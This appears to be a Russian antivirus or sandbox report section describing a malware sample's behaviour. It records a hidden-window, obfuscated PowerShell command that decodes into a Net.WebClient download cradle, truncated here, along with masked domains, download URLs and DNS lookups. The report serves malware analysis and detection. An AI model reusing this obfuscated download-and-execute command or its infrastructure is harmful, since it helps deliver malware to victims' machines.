Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "& ( $ShELlid[1]+$sheLlID[13]+'x')( [STriNg]::JOIN( '', [cHar[]] ( 36 ,116, 97 , 84, 61,110 ,101 ,119,45, 111 ,98 ,106 ,101, 99 ,116 , 32 , 78,101 , 116,46,87,101 ,98 , 67,108 , 105,101,110,116...
- 'in##5.vn':80
- 'es#####epublica.com.br':80
- 'es#####epublica.com.br':443
- 'ec###ystem.ru':80
- http://in##5.vn/FJ4At2g2/
- http://www.es#####epublica.com.br/wp-content/DAoI/
- http://ec###ystem.ru/5/
- 'es#####epublica.com.br':443
- DNS ASK in##5.vn
- DNS ASK es#####epublica.com.br
- DNS ASK ec###ystem.ru
- DNS ASK rb#.#ebstels.ru
- DNS ASK ig###koshki.ru
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "& ( $ShELlid[1]+$sheLlID[13]+'x')( [STriNg]::JOIN( '', [cHar[]] ( 36 ,116, 97 , 84, 61,110 ,101 ,119,45, 111 ,98 ,106 ,101, 99 ,116 , 32 , 78,101 , 116,46,87,101 ,98 , 67,108 , 105,101,110,116...' (со скрытым окном)